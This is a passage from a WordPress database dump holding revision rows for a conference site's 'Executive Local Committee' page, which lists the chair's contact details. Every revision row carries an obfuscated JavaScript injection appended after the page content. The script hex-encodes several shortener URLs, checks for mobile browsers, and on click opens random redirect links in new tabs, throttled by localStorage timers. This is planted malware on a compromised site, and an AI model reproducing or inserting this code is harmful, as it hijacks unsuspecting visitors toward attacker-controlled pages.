_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 07:25:45','2023-06-27 07:25:45','',4849,'https://gsw2023.com/?p=4859',0,'revision','',0),
(4860,4,'2023-06-27 07:32:23','2023-06-27 07:32:23','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<span style=\"font-size: 14pt;\"><strong>Chair</strong></span>\r\n\r\n<hr />\r\n\r\n<span style=\"font-size: 12pt;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\n\r\nVice President for Post Graduate and Scientific Research\r\n\r\nArab Academy for Science, Technology and Maritime Transport\r\n\r\nP.O.Box 1029, Alexandria, Egypt\r\n\r\nE-mail:          aaelbary@aast.edu\r\n<p style=\"padding-left: 80px;\">aaelbary@gsw2023.com</p>\r\n<p style=\"padding-left: 80px;\">gsw2023@aast.edu</p>\r\nOffice: +203 5497598\r\n\r\nFax: +203 5497598\r\n\r\nMobile: +20 100 7382 198[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 07:32:23','2023-06-27 07:32:23','',4849,'https://gsw2023.com/?p=4860',0,'revision','',0),
(4861,4,'2023-06-27 07:48:29','2023-06-27 07:48:29','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<span style=\"font-size: 14pt;\"><strong>Chair</strong></span>\r\n\r\n<hr />\r\n\r\n<span style=\"font-size: 12pt;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td><strong>E-mail:</strong></td>\r\n<td>aaelbary@aast.edu</td>\r\n<td>aaelbary@gsw2023.com</td>\r\n<td>gsw2023@aast.edu</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nOffice: +203 5497598\r\nFax: +203 5497598\r\nMobile: +20 100 7382 198[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 